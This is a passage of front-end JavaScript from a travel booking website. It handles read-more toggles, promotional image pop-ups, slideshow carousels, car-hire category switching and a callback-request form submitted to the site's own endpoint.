            maxHeight = (maxHeight.indexOf('%') > -1) ? maxHeight : maxHeight + 'px';
        } else {
            maxHeight = maxHeight + 'px';
        }      
        if (getElement(contentId).style.height === (minHeight + 'px') || getElement(contentId).style.height === '') {
            getElement(contentId).style.height = maxHeight;
            getElement(contentId).style.maxHeight = '100%';
            //getElement(linkId).parentNode.style.right = 300 + 'px';
            //getElement(linkId).parentNode.style.top = 1360 + 'px';
            getElement(linkId).style.marginLeft = '10px';
            getElement(linkId).innerHTML = 'Close';
        } else {
            getElement(contentId).style.height = minHeight + 'px';
            getElement(contentId).style.maxHeight = '695px';
            getElement(linkId).style.marginLeft = '10px';
            getElement(linkId).innerHTML = 'Read more';
            //getElement(linkId).parentNode.style.right = 300 + 'px';
            //getElement(linkId).parentNode.style.top = 948 + 'px';
        }
    }
    return false;
}

function showAllInfo(contentId, contentId2, minHeight, maxHeight) {
    if (getElement(contentId)) {
        if (typeof maxHeight != 'number') {
            maxHeight = (maxHeight.indexOf('%') > -1) ? maxHeight : maxHeight + 'px';
        } else {
            maxHeight = maxHeight + 'px';
        }
        if (getElement(contentId).style.height === (minHeight + 'px') || getElement(contentId).style.height === '') {
            getElement(contentId).style.height = maxHeight;
            getElement(contentId).style.maxHeight = '100%';
            getElement(contentId2).style.height = maxHeight;
            getElement(contentId2).style.maxHeight = '100%';
        } else {
            getElement(contentId).style.height = minHeight + 'px';
            getElement(contentId).style.maxHeight = '795px';
            getElement(contentId2).style.height = '95px';
            getElement(contentId2).style.maxHeight = '100px';
        }
    }
    return false;
}


/* FLIGHTS DEFAULT.ASPX */
function showReasonsToCallInfo(contentId, textHolderId, linkId) {
    if (getElement(contentId)) {
        if (getElement(contentId).style.height === (314 + 'px') || getElement(contentId).style.height === '' && getElement(textHolderId)) {
            getElement(contentId).style.height = '100%';
            getElement(textHolderId).style.height = '100%';
            getElement(linkId).style.right = 90 + 'px';
            getElement(linkId).style.bottom = 12 + 'px';
            getElement(linkId).innerHTML = 'Close';
        } else {
            getElement(contentId).style.height = 314 + 'px';
            getElement(textHolderId).style.height = 290 + 'px';
            getElement(linkId).innerText = 'Read more';
            getElement(linkId).style.right = 50 + 'px';
            getElement(linkId).style.bottom = 6 + 'px';
        }
    }
    return false;
}

function jqueryReasonsToCall() {
    if (document.getElementById('reasonstatus') !== undefined && $('#reasonstatus').val() == 'toshow') {
        $('.reasontocall').css({ 'height': '100%' });
        $('#expandflighttext').html('Close');
        $('#reasonstatus').val('tohide');
    } else if (document.getElementById('reasonstatus') !== undefined && $('#reasonstatus').val() == 'tohide') {
        $('.reasontocall').css({ 'height': '100px' });
        $('#expandflighttext').html('Read more');
        $('#reasonstatus').val('toshow');
    } else {
        $('.reasontocall').css({ 'height': '100px' });
        $('#expandflighttext').html('Read more');
        $('#reasonstatus').val('toshow');
    }
}


/* END FLIGHTS DEFAULT.ASPX */

function displayTextInfo(id) {
    
    if (document.getElementById(id).style.display == 'block'){
        document.getElementById(id).style.display = 'none';
    } else {
        document.getElementById(id).style.display = 'block';
    }

}


String.prototype.trim = function () {
    return this.replace(/^\s*|\s*$/g, '');
};

/* Travel magazine changeImg */
var previousMagazineElement;

function changeMagazineImg(imgName, travelMagId, titleHeadline,  currentElement) {

    var imageId = document.getElementById(imgName);
    var imageParent = imageId.parentNode;

    imageParent.href = "'javascript:intializeMagazineViewer(" + travelMagId + "');";
    imageId.title = titleHeadline;

    if (previousMagazineElement) {
        previousMagazineElement.style.color = 'black';
        previousMagazineElement.parentNode.style.listStyleImage = 'none';
    }

    if (imageId) {
        imageId.src = "/utility/magazineimg.aspx?thumnailimg=" + travelMagId;
    }

    if (currentElement) {
        currentElement.style.color = '#EA8533';
        previousMagazineElement = currentElement;
    }


}

/* Anchor on page */
function querySt() {
    hu = window.location.search.substring(1);
    gy = hu.split("?");
    if (hu && gy.length > 0) {
        for (i = 0; i < gy.length; i++) {
            ft = gy[i].split("=");
            if (ft[1]) {
                switch (ft[1]) {
                    case 'southafricanairways':
                        SouthAfricaPromotion.backHome();
                        SouthAfricaPromotion.showSAA();
                        break;

                    default:
                        break;
                }
            }
        }
    }
}

/* OUR CHARITY */

var preLoadSpecialOfferImageNames = [];
var interval = 5000;
var random_display = 0;
var imageNum = 0;
var imageUrlsNum = 0;
var chaletTxtNum = 0;
var timerID;
var imageArray = [];

function defaultSpecialOffersPageLoaded(imageNames) {

    preLoadSpecialOfferImageNames = imageNames;

    imageArray = [];

    for (var i = 0; i < preLoadSpecialOfferImageNames.length; i++) {
        imageArray[imageNum++] = new imageItem('/images/ourcharity/' + preLoadSpecialOfferImageNames[i] + '.jpg');
    }

    var timerID = setTimeout(FadeInImage, interval);
}

function imageItem(image_location) {
    this.image_item = new Image();
    this.image_item.src = image_location;
}


function get_ImageItemLocation(imageObj) {
    return (imageObj.image_item.src);
}

function randNum(x, y) {
    var range = y - x + 1;
    return Math.floor(Math.random() * range) + x;
}

function getNextImage() {

    var totalImages;

    totalImages = imageArray.length;

    if (random_display) {
        imageNum = randNum(0, totalImages - 1);
    }
    else {
        imageNum = (imageNum + 1) % totalImages;
    }

    var new_image = get_ImageItemLocation(imageArray[imageNum]);
    return (new_image);
}


function SetOpacity(object, opacityPct) {
    // IE.
    object.style.filter = 'alpha(opacity=' + opacityPct + ')';
    // Old mozilla and firefox
    object.style.MozOpacity = opacityPct / 100;
    // Everything else.
    object.style.opacity = opacityPct / 100;
}

function ChangeOpacity(id, msDuration, msStart, fromO, toO) {
    var element = document.getElementById(id);
    var opacity = element.style.opacity * 100;
    var msNow = (new Date()).getTime();

    opacity = fromO + (toO - fromO) * (msNow - msStart) / msDuration;

    if (opacity < 0)
        SetOpacity(element, 0);
    else if (opacity > 100)
        SetOpacity(element, 100);
    else {
        SetOpacity(element, opacity);
        element.timer = window.setTimeout("ChangeOpacity('" + id + "'," + msDuration + "," + msStart + "," + fromO + "," + toO + ")", 1);
    }
}

function FadeInImage() {

    var foregroundID;
    var backgroundID;

    foregroundID = document.getElementById('mainimage');
    backgroundID = document.getElementById('imgholder');

    if (backgroundID) {
        backgroundID.style.backgroundImage = 'url(' + foregroundID.src + ')';
        backgroundID.style.backgroundRepeat = 'no-repeat';
    }

    SetOpacity(foregroundID, 0);

    foregroundID.src = getNextImage();

    if (foregroundID.timer) window.clearTimeout(foregroundID.timer);

    var startMS = (new Date()).getTime();

    foregroundID.timer = window.setTimeout("ChangeOpacity('" + foregroundID.id + "', 1000," + startMS + ",0,100)", 10);

    var timerID = setTimeout(FadeInImage, interval);

}

function expandText(obj) {

    var txtToIncrease = obj;

    if (txtToIncrease) {

        txtToIncrease.parentElement.style.height = 'auto';
        txtToIncrease.style.visibility = 'hidden';

    }

}

function closeText(obj, id) {

    var txtToClose = obj;

    if (txtToClose && txtToClose.parentElement.id != 'crickettxtlong') {

        txtToClose.parentElement.style.height = '238px';
        document.getElementById(id).style.visibility = 'visible';
    } else {
        txtToClose.parentElement.style.height = '258px';
        document.getElementById(id).style.visibility = 'visible';
    }

}
/* END OUR CHARITY */


function buttonEffect(imgUrl, id) {
    if (imgUrl && id) {
        document.getElementById(id).src = imgUrl;
    }
}



/* COOKISLANDS PROMOTIONS PAGE */
function displayBackgroundImg(id) {
    
    if (document.getElementById(id)) {
        document.getElementById(id).style.display = 'block';
    }

}

function hideBackgroundImg(id) {
    
    if (document.getElementById(id)) {
        document.getElementById(id).style.display = 'none';
    }
}

function changeZindex(show, hide1, hide2, hide3, hide4, hide5, hide6, hide7, hide8, hide9, hide10) {

    if (document.getElementById(show)) {

        document.getElementById(show).style.zIndex = '11';

        if (document.getElementById(hide1)) {
            document.getElementById(hide1).style.zIndex = '10';
        }

        if (document.getElementById(hide2)) {
            document.getElementById(hide2).style.zIndex = '9';
        }

        if (document.getElementById(hide3)) {
            document.getElementById(hide3).style.zIndex = '8';
        }

        if (document.getElementById(hide4)) {
            document.getElementById(hide4).style.zIndex = '7';
        }

        if (document.getElementById(hide5)) {
            document.getElementById(hide5).style.zIndex = '6';
        }

        if (document.getElementById(hide6)) {
            document.getElementById(hide6).style.zIndex = '5';
        }

        if (document.getElementById(hide7)) {
            document.getElementById(hide7).style.zIndex = '4';
        }

        if (document.getElementById(hide8)) {
            document.getElementById(hide8).style.zIndex = '3';
        }

        if (document.getElementById(hide9)) {
            document.getElementById(hide9).style.zIndex = '2';
        }

        if (document.getElementById(hide10)) {
            document.getElementById(hide10).style.zIndex = '1';
        }

    }

}

function changeResortImg(mainImgId, imgName, imgUrl, imgExtension) {

    var imgToChange = document.getElementById(mainImgId);
    var newImgSrc;

    if (imgUrl && imgExtension) {
        newImgSrc = imgUrl + imgName + imgExtension;
    } else {
        newImgSrc = '/images/promotions/cookislands/offers/large/' + imgName + '.jpg';
    }


    if (imgToChange) {
        imgToChange.src = newImgSrc;
    }
}

/* END COOKISLANDS PROMOTIONS PAGE */

var toggleTabs = {

    showAndHide: function () {
        'use strict';

        var args = arguments;

        for (var i = 0; i < args.length; i++) {
            if (i === 0) {
                if (document.getElementById(args[i])) {
                    document.getElementById(args[i]).style.display = 'block';
                }
            } else {
                if (document.getElementById(args[i])) {
                    document.getElementById(args[i]).style.display = 'none';
                }
            }

        }
    }
};

function showBlogThumb(thumbUrl, id) {

    var tagId = document.getElementById(id);

    if (thumbUrl && tagId) {
        tagId.innerHTML = "";
        tagId.style.backgroundImage = 'url("' + thumbUrl + '")';
        tagId.style.backgroundSize = '60px 45px';
        tagId.style.padding = '0px';
        tagId.style.height = '45px';
        tagId.style.width = '60px';
        tagId.style.filter='progid:DXImageTransform.Microsoft.AlphaImageLoader(src="'+ thumbUrl +'", sizingMethod=scale)';
    }

}


function showBlogNumber(blogNumber) {

    var str = 'blognumber' + blogNumber;
    var tagId = document.getElementById(str);

    if (blogNumber && tagId) {
        tagId.innerHTML = blogNumber;
        tagId.style.paddingTop = '15px';
        tagId.style.paddingBottom = '5px';
        tagId.style.height = '25px';
        tagId.style.backgroundImage = 'none';
        tagId.style.filter = 'progid:DXImageTransform.Microsoft.AlphaImageLoader(src="", sizingMethod=scale)';
    }
}


var currentDisplayId = 1;
var timeOut;

function scrollImages(direction) {

    var str;
    var indexOfComma;
    var indexOfBracket;
    var id;
    var imageLinksArray = getElement('thumbnailimgholder').getElementsByTagName('a');
    var index = 0;
    
    $("#largeimgholder")[0].style.width = parseFloat(896.99 * imageLinksArray.length) + 896 + "px";

    for (var i = 0; i < imageLinksArray.length; i++) {

        imageLinksArray[i].getElementsByTagName('img')[0].style.border = 'none';
    }

    if (direction == 'right') {

        if (currentDisplayId == imageLinksArray.length) {
            index = currentDisplayId;
        }else if (currentDisplayId != 1) {
            index = currentDisplayId + 1;
        } else {
            index = currentDisplayId;
        }

        if (index === -1 || index - 1 === 0 || index === 0) {
            // IF INDEX IS 0 OR 1 WE WANT THE NEXT IMAGE TO BE 2 (ROBCAHOON)
            getElement('img' + 2).style.border = 'solid 1px black';
            index = 2;
            timeOut = setTimeout(function () {
                scrollImages('right');
            }, 5000); 
        } else if (index == imageLinksArray.length) {
            // IF WE ARE AT THE FINAL IMAGE DON'T GO ANY FURTHER (ROBCAHOON)
            getElement('img' + imageLinksArray.length).style.border = 'solid 1px black';
            index = imageLinksArray.length;
            timeOut = setTimeout(function () {
                scrollImages('left');
            }, 5000);
        } else {
            //SCROLL THROUGH 1 IMAGE AT A TIME (ROBCAHOON)
            getElement('img' + index).style.border = 'solid 1px black';
            timeOut = setTimeout(function () {
                scrollImages('right');
            }, 5000);
        }

        currentPosition = $("#largeimgholder")[0].style.left;
        currentPosition = -parseFloat(896.99 * parseFloat(index - currentDisplayId));

        if (newPosition === 0) {
            newPosition = currentPosition;
        } else {
            newPosition = newPosition + currentPosition;
        }

        if (index === 1) {
            newPosition = 0;
        }

        if (index === 6 || index === 11) {
            //SCROLL THE WHOLE SLIDER (ROBCAHOON)
            scrollThumbImage('left');
        }

        $("#largeimgholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
        currentDisplayId = index;
        if (index == imageLinksArray.length) {
            index = imageLinksArray.length;
        } else {
            index = index + 1;
        }
        
    } else {

        if (currentDisplayId != 1) {
            index = currentDisplayId;
        } else {
            index = currentDisplayId - 1;
        }

        if (index === -1 || index - 1 === 0 || index === 0) {
            // AS WE ARE GOING BACKWARDS ON THE IMAGES WE DO WANT IT TO GO BACK TO 1 (ROBCAHOON)
            index = 1;
            getElement('img' + index).style.border = 'solid 1px black';
            timeOut = setTimeout(function () {
                scrollImages('right');
            }, 5000);
        } else {
            // JUST SCROLL BACK THROUGH THE IMAGES 1 AT A TIME (ROBCAHOON)
            var num = index - 1;
            getElement('img' + num).style.border = 'solid 1px black';
            timeOut = setTimeout(function () {
                scrollImages('left');
            }, 5000);
        }

        currentPosition = $("#largeimgholder")[0].style.left;
        currentPosition = parseFloat(896.99 * parseFloat(index + 1 - currentDisplayId));

        if (newPosition === 0) {
            newPosition = currentPosition;
        } else {
            newPosition = newPosition + currentPosition;
        }

        if (index === 1 || index - 1 === 1) {
            newPosition = 0;
            currentDisplayId = 2;
        }

        if (index === 6 || index === 11) {
            //SCROLL THE WHOLE SLIDER
            scrollThumbImage('right');
        }

        $("#largeimgholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
        currentDisplayId = currentDisplayId - 1;
    }

}



function selectImage(index) {

    var imageLinksArray = getElement('thumbnailimgholder').getElementsByTagName('a');

    for (var i = 0; i < imageLinksArray.length; i++) {
        imageLinksArray[i].getElementsByTagName('img')[0].style.border = 'none';
    }

    getElement('img' + index).style.border = 'solid 1px black';

    $("#largeimgholder")[0].style.width = parseFloat(896.99 * imageLinksArray.length) + 896 + "px";

    currentPosition = $("#largeimgholder")[0].style.left;
    currentPosition = -parseFloat(896.99 * parseFloat(index - currentDisplayId));

    if (newPosition === 0) {
        newPosition = currentPosition;
    } else {
        newPosition = newPosition + currentPosition;
    }

    if (index == 1) {
        newPosition = 0;
    }

    $("#largeimgholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
    currentDisplayId = index;

}

var currentImgScroll = 1;

function scrollThumbImage(direction) {
    var imgPerPage = 5;
    var imageLinksArray = getElement('thumbnailimgs').getElementsByTagName('a');
    var maxNumberOfPages = Math.ceil(imageLinksArray.length / imgPerPage);

    if (direction == 'left' && currentImgScroll < maxNumberOfPages) {
        $("#thumbnailimgs").animate({ "left": "-=895px" }, 1000);
        currentImgScroll += 1;
    } else if (direction == 'right' && currentImgScroll > 1) {
        $("#thumbnailimgs").animate({ "left": "+=895px" }, 1000);
        currentImgScroll -= 1;
    }
}

function displayQatarOffer(id1, offerbarStr, imgtodisplay, altText) {

    var offerBar = document.getElementById(id1);
    var offerInfo = document.getElementById('offerimgholder');
    var qatarImgPath = '/images/promotions/qatar/';

    if (offerBar) {
        offerBar.src = qatarImgPath + offerbarStr;
    }

    var img = document.getElementById("qatarofferimg");

    img.src = qatarImgPath + imgtodisplay;
    img.alt = altText;

    offerInfo.style.display = 'block';

}

function hideQatarOffer(id1, id2, offerbarStr) {

    var offerBar = document.getElementById(id1);
    var offerInfo = document.getElementById(id2);
    var qatarImgPath = '/images/promotions/qatar/';

    if (offerInfo) {
        offerInfo.style.display = 'none';
        offerBar.src = qatarImgPath + offerbarStr;
    }

}

function displayAussieOffer(image, posX, posY, popUpImgId, folderName) {
    var mightBoxFade = document.getElementById('mightbox_fade');
    var mightboxcloseImg = document.getElementById('mightboxclose');
    var popUpImg = document.getElementById(popUpImgId);
    var popupImgPath = '/images/promotions/';
    var pageBody = document.getElementsByTagName('body');

    if (folderName) {
        popupImgPath = popupImgPath + folderName;
    } else {
        popupImgPath = popupImgPath + 'aussiesale/';
    }


    if (mightBoxFade && mightboxcloseImg) {
        popUpImg.src = popupImgPath + image;
        popUpImg.style.zIndex = '1000';
        popUpImg.style.display = 'block';
        popUpImg.style.top = posX + 'px';
        popUpImg.style.left = posY + 'px';
        document.getElementsByTagName('body')[0].appendChild(popUpImg);
        mightBoxFade.style.backgroundColor = '#7c7b7a';
        mightBoxFade.style.display = 'block';
        mightboxcloseImg.style.display = 'none';
        mightBoxFade.style.zIndex = '1';
        mightBoxFade.style.opacity = 0.4;
        mightBoxFade.style.filter = "alpha(opacity=40)";
    }

}

function closeAussieOffer(popUpImgId, offerImageId) {
    var mightBoxFade = document.getElementById('mightbox_fade');
    var popUpImg = document.getElementById(popUpImgId);

    mightBoxFade.style.display = 'none';
    popUpImg.style.display = 'none';

    if (offerImageId) {
        document.getElementById(offerImageId).style.display = 'none';
    }

}

function promotionsSwapImg(imgId, image, folderName) {

    var popUpImg = document.getElementById(imgId);
    var popupImgPath;

    if (document.getElementById('chilepopup').src !== '' && imgId == 'chileimgoffer') {
        var imgSrc = document.getElementById('chilepopup').src;
        var lastIndex = imgSrc.lastIndexOf('.jpg');
        var newString;

        if (lastIndex != -1) {
            newString = imgSrc.substring(lastIndex, lastIndex - 8);

            newString = newString.replace('-', '');

            folderName = '/images/promotions/' + folderName + newString + '/';
            popupImgPath = folderName;
            popUpImg.src = popupImgPath + image;
            popUpImg.style.display = 'block';
            popUpImg.style.zIndex = 2000;
            document.getElementsByTagName('body')[0].appendChild(popUpImg);

        }
    } else {
        if (popUpImg && image && folderName) {
            popupImgPath = '/images/promotions/' + folderName;
            popUpImg.src = popupImgPath + image;
            popUpImg.style.display = 'block';
            popUpImg.style.zIndex = 2000;
        }
    }
 
}

function displayPromotionalOffer(image, posX, posY, popUpImgId, folderName, offerImg) {
    var mightBoxFade = document.getElementById('mightbox_fade');
    var mightboxcloseImg = document.getElementById('mightboxclose');
    var popUpImg = document.getElementById(popUpImgId);
    var popupImgPath = '/images/promotions/';
    var pageBody = document.getElementsByTagName('body');

    if (mightBoxFade && mightboxcloseImg) {
        popupImgPath = popupImgPath + folderName;
        popUpImg.src = popupImgPath + image;
        popUpImg.style.zIndex = '1000';
        popUpImg.style.display = 'block';
        popUpImg.style.top = posX + 'px';
        popUpImg.style.left = posY + 'px';
        document.getElementsByTagName('body')[0].appendChild(popUpImg);
        mightBoxFade.style.backgroundColor = '#7c7b7a';
        mightBoxFade.style.display = 'block';
        mightboxcloseImg.style.display = 'none';
        mightBoxFade.style.zIndex = '1';
        mightBoxFade.style.opacity = 0.4;
        mightBoxFade.style.filter = "alpha(opacity=40)";

        if (offerImg) {

            var imgSrc = popupImgPath + image;
            var lastIndex = imgSrc.lastIndexOf('.jpg');
            var newString;

            if (lastIndex != -1) {
                newString = imgSrc.substring(lastIndex, lastIndex - 8);

                newString = newString.replace('-', '');

                promotionsSwapImg('chileimgoffer', offerImg, folderName);

            }
        }

    }

}

function validateCallBackRequestForm() {

    var name = document.getElementById('name');
    var telephone = document.getElementById('telephone');
    var destination = document.getElementById('destination');
    var preferredtime = document.getElementById('preferredtime');
    var submit = document.getElementById('submit');
    var results = document.getElementById('results');
    var allErrors = '';

    if (name.value === '') {
        allErrors += 'Please enter your name <br />';
    }

    if (telephone.value === '') {
        allErrors += 'Please enter a telephone number <br />';
    }

    if (destination.value == '0') {
        allErrors += 'Please select a valid destination <br />';
    }

    if (preferredtime.value == '0') {
        allErrors += 'Please select a preferred time you wished to be called back <br />';
    }

    if (allErrors == '') {
        results.innerHTML = '';
        console.log('No errors');       
        return true;
    } else {
        console.log('Errors');
        results.innerHTML = allErrors;
        $("#results").css('color', 'red');
        return false;
    }

}

$(document).ready(function () {

    var submit = document.getElementById('submit');
    var loader = $(".sk-circle--request");
    var callbackGuid = document.getElementById('callback_guid');

    if (callbackGuid) {
        callbackGuid.value = guid() + '_1';
    }
    
    $("form#callback").submit(function (e) {
        e.preventDefault();
        submit.disabled = true;
        loader.show();
        submit.style.backgroundColor = '#a9a9a9';
        $.ajax({
            type: "POST",
            dataType: "html",
            data: $("#callback").serialize(),
            cache: false,
            url: "/utility/callbackrequest.aspx",
            success: function (data, textStatus, xhr) {
                if (xhr.status === 200) {
                    var callbackGuid = document.getElementById('callback_guid');
                    var submitCount;
                    if (callbackGuid) {
                        callbackGuid.value = guid() + '_1';
                        submitCount = parseInt(callbackGuid.value.split('_')[1], 10) + 1;
                        callbackGuid.value = callbackGuid.value.split('_')[0] + '_' + submitCount;
                    }                    
                    document.getElementById('name').value = '';
                    document.getElementById('telephone').value = '';
                    document.getElementById('emailaddress').value = '';
                    document.getElementById('destination').value = '';
                    document.getElementById('preferredtime').value = '0';
                }
                submit.style.backgroundColor = '#ff0000';
                submit.disabled = false;
                loader.hide();
                $("#results").html(data);
                $("#results").css('color', 'green');
            },
            error: function (data, textStatus, xhr) {
                submit.style.backgroundColor = '#ff0000';
                submit.disabled = false;
                loader.hide();
                //$("#results").html(data.responseText);
                $("#results").css('color', 'red');
            }
        });
        return false;
    });

});

function guid() {

    function s4() {
        return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1);
    }

    return s4() + s4() + '-' + s4() + s4() + '-' + s4() + s4() + '-' + s4() + s4();

}


function showCallbackRequestAlt() {
    document.getElementById('callbackholderalt').style.display = 'block';
    document.getElementById('resultsdetails').style.display = 'none';
}

function hideCallbackRequestAlt() {
    document.getElementById('resultsdetails').style.display = 'block';
    document.getElementById('callbackholderalt').style.display = 'none';
}

function validateFeaturedContent() {

    var webLocation = document.getElementById('weblocsearchinput2').value;
    var title = document.getElementById('title').value;
    var subtitle = document.getElementById('subtitle').value;
    var description = document.getElementById('textdescription').value;
    var contenttype = document.getElementById('contenttype').value;
    var error = '';

    if (webLocation.length === 0) {
        error += 'Please add a Website Location Name \n';
    }

    if (title.length === 0) {
        error += 'Please add a Title \n';
    }

    if (subtitle.length === 0) {
        error += 'Please add a Subtitle \n';
    }

    if (description.length === 0) {
        error += 'Please add a description \n';
    }

    if (contenttype === 0) {
        error += 'Please select a Content Type \n';
    }

    if (error !== '') {
        document.getElementById('error').innerText = error;
        document.getElementById('error').style.display = 'block';
        return false;
    } else {
        return true;
    }

}

function toggleToOr(id, to, or, linkId) {
    if (document.getElementById(id) && document.getElementById(linkId)) {
        if (document.getElementById(id).style.maxHeight === '' || document.getElementById(id).style.maxHeight == or) {
            document.getElementById(id).style.maxHeight = to;
            document.getElementById(linkId).innerHTML = 'Hide...';
        } else if (document.getElementById(id).style.maxHeight == to) {
            document.getElementById(id).style.maxHeight = or;
            document.getElementById(linkId).innerHTML = 'Read more...';
        }
    }
}

var ScrollGallery = (function () {
    'use strict';

    return (function () {

        var Direction = {
            Left: 'Left',
            Right: 'Right',
            Up: 'Up',
            Down: 'Down'
        };

        function scroll(id, direction, scrollStepAmount, limit) {

            var element = ('object' !== typeof id) ? LotusGroup.DOM.el(id) : id;

            if (element) {
                switch (direction) {
                    case Direction.Left:
                        if (element.style.left === '') {
                            element.style.left = -scrollStepAmount + 'px';
                        } else {
                            if ((posToInt(element.style.left) - scrollStepAmount) > limit) {
                                element.style.left = (posToInt(element.style.left) - scrollStepAmount) + 'px';
                            } else {
                                element.style.left = '0px';
                            }
                        }
                        break;
                    case Direction.Right:
                        if (element.style.left === '') {
                            if (scrollStepAmount <= limit) {
                                element.style.left = scrollStepAmount + 'px';
                            }
                        } else {
                            if ((posToInt(element.style.left) + scrollStepAmount) <= limit) {
                                element.style.left = (posToInt(element.style.left) + scrollStepAmount) + 'px';
                            }
                        }
                        break;
                    case Direction.Up:
                        if (element.style.top === '') {
                            element.style.top = -scrollStepAmount + 'px';
                        } else {
                            if ((posToInt(element.style.top) - scrollStepAmount) > limit) {
                                element.style.top = (posToInt(element.style.top) - scrollStepAmount) + 'px';
                            }
                        }
                        break;
                    case Direction.Down:
                        if (element.style.top === '') {
                            element.style.top = scrollStepAmount + 'px';
                        } else {
                            if ((posToInt(element.style.top) + scrollStepAmount) <= limit) {
                                element.style.top = (posToInt(element.style.top) + scrollStepAmount) + 'px';
                            }
                        }
                        break;
                }
            }

        }

        function posToInt(pos) {

            var indexOfPX = pos.indexOf('px');

            return (indexOfPX > -1) ? parseInt(pos.substr(0, indexOfPX), 10) : parseInt(pos, 10);

        }

        //EXPOSE PUBLIC METHODS & PROPERTIES
        return {
            scroll: scroll,
            Direction: Direction
        };

    } ());

} ());

function rollOver(mouseOverOrOut, hotelOrTour, object) {

    var img;

    if (hotelOrTour == 'hotel') {

        img = document.getElementById(object.id);

        if (mouseOverOrOut == 'over') {
            img.src = '/images/hotels/offer-roundels/button-big-rollover.png';
        } else if (mouseOverOrOut == 'out') {
            img.src = '/images/hotels/offer-roundels/button-big.png';
        }

    } else if (hotelOrTour == 'tour') {
    
        img = document.getElementById('tourofferroundel');

        if (mouseOverOrOut == 'over') {
            img.src = '/images/hotels/offer-roundels/special-offers-view-all-select.png';
        } else if (mouseOverOrOut == 'out') {
            img.src = '/images/hotels/offer-roundels/special-offers-view-all.png';
        }

    }
}

function displayOfferList() {

    var holderId = document.getElementById('sp' + window.location.hash.substr(1));
    var specialOfferList = document.getElementById('specailofferlist');
    var currentOffer = document.getElementById('currentOffer');

    if (holderId) {
        holderId.style.display = 'none';
        specialOfferList.style.display = 'block';
    } else if (specialOfferList) {
        if (currentOffer.value.length > 0) {
            holderId = document.getElementById('sp' + currentOffer.value);
            holderId.style.display = 'none';
        }
        specialOfferList.style.display = 'block';
    }

}

function hashInUrl(hash) {

    var hashUrl = window.location.hash;
    var defaultDiv = document.getElementById('cardefault');
    var currentHashUsed;

    if (hashInUrl.length > 1) {
        currentHashUsed = hashUrl;
    } else {
        currentHashUsed = hash;
    }

    switch (currentHashUsed) {
        case '#supercar':
            defaultDiv.style.display = 'none';
            document.getElementById('supercars').style.display = 'block';
            document.getElementById('supercarmainimg').src = '/images/cars/supercar-collection.jpg';
            document.getElementById('adrenalinemainimg').src = '/images/cars/adrenaline-collection-fade.jpg';
            document.getElementById('hybridmainimg').src = '/images/cars/hybrid-collection-fade.jpg';
            break;
        case '#adrenaline':
            document.getElementById('adrenalinetext').style.display = 'block';
            document.getElementById('hybridtext').style.display = 'none';
            document.getElementById('carhireinfo').style.display = 'none';
            $('.adrenaline').screwDefaultButtons("check");
            swapCarCategory('cartypeselectortitleac', 'cartypeselectorac', 'cartypeselectortitlebvc', 'cartypeselectorbvc', 'cartypeselectortitlehc', 'cartypeselectorhc', 'adrenaline');
            defaultDiv.style.display = 'block';
            document.getElementById('supercars').style.display = 'none';
            document.getElementById('adrenalinemainimg').src = '/images/cars/adrenaline-collection.jpg';
            document.getElementById('hybridmainimg').src = '/images/cars/hybrid-collection-fade.jpg';
            document.getElementById('supercarmainimg').src = '/images/cars/supercar-collection-fade.jpg';
            break;
        case '#hybrid':
            document.getElementById('hybridtext').style.display = 'block';
            document.getElementById('adrenalinetext').style.display = 'none';
            document.getElementById('carhireinfo').style.display = 'none';
            document.getElementById('cartypeselectorbvc').style.display = 'none';
            document.getElementById('cartypeselectorac').style.display = 'none';
            document.getElementById('cartypeselectorhc').style.display = 'block';
            defaultDiv.style.display = 'block';
            $('.hybrid').screwDefaultButtons("check");
            swapCarCategory('cartypeselectortitlehc', 'cartypeselectorhc', 'cartypeselectortitleac', 'cartypeselectorac', 'cartypeselectortitlebvc', 'cartypeselectorbvc', 'hybrid');
            document.getElementById('supercars').style.display = 'none';
            document.getElementById('hybridmainimg').src = '/images/cars/hybrid-collection.jpg';
            document.getElementById('adrenalinemainimg').src = '/images/cars/adrenaline-collection-fade.jpg';
            document.getElementById('supercarmainimg').src = '/images/cars/supercar-collection-fade.jpg';
            break;
        default:
            defaultDiv.style.display = 'block';
    }

}

function preSetSearchParameters(destinationName, categorySelected) {
    var destName = destinationName;
    var categorySearched = categorySelected;
    var destFormField = document.getElementById('cslocation');

    if (destFormField) {
        switch (categorySearched) {
            case 'ADRENALINE':
                $('.adrenaline').screwDefaultButtons("check");
                swapCarCategory('cartypeselectortitleac', 'cartypeselectorac', 'cartypeselectortitlebvc', 'cartypeselectorbvc', 'cartypeselectortitlehc', 'cartypeselectorhc', 'adrenaline');
                break;
            case 'HYBRID':
                $('.hybrid').screwDefaultButtons("check");
                swapCarCategory('cartypeselectortitlehc', 'cartypeselectorhc', 'cartypeselectortitleac', 'cartypeselectorac', 'cartypeselectortitlebvc', 'cartypeselectorbvc', 'hybrid');
                break;
            default:
                document.getElementById('cstypeofsearchcheapest').checked = true;
                break;
        }

        destFormField.innerHTML = destName;
        destFormField.value = destName;
    }
}

// staticScroll function
Object.defineProperty(Object.prototype, 'staticScroll', {
    enumerable: false,
    configurable: true,
    value: function (lmt) {
        var enableLimit = lmt || 768, _self = this, tmr;

        _self.setMeasurements = function () {
            _self.setToStatic();
            _self.originalTop = this.offset().top;
            _self.originalLeft = this.offset().left;
            _self.originalWidth = this.width();
        }

        _self.cssTxt = function () {
            return 'position: fixed;' +
					'left: ' + _self.originalLeft + ';' +
					'top: 0;' +
					'width:' + _self.originalWidth + 'px;' +
					'box-sizing: content-box;' +
					'z-index: 101';
        }

        _self.setToFixed = function () {
            _self.setMeasurements();
            _self.fixedStatus = true;
            _self[0].setAttribute('style', _self.cssTxt());
            _self.addClass('fixed');
        }

        _self.setToStatic = function () {
            _self.fixedStatus = false;
            _self[0].setAttribute('style', '');
            _self.removeClass('fixed');
        }

        _self.scrollFunc = function () {
            if (_self.enabled) {
                var top = window.pageYOffset || document.documentElement.scrollTop;
                if (top > _self.originalTop && !_self.fixedStatus) {
                    _self.setToFixed();
                } else if (top <= _self.originalTop && _self.fixedStatus) {
                    _self.setToStatic();
                }
            }
        }

        _self.resizeFunc = function () {
            var w = Math.max(document.documentElement.clientWidth, window.innerWidth || 0);
            if (w <= enableLimit) {
                _self.enabled = false;
                _self.setToStatic();
            } else {
                _self.enabled = true;
                _self.setMeasurements();
                _self.scrollFunc();
            }
        }

        _self.init = function () {
            // set up
            _self.fixedStatus = false;
            _self.enabled = true;
            _self.setMeasurements();
            _self.resizeFunc();
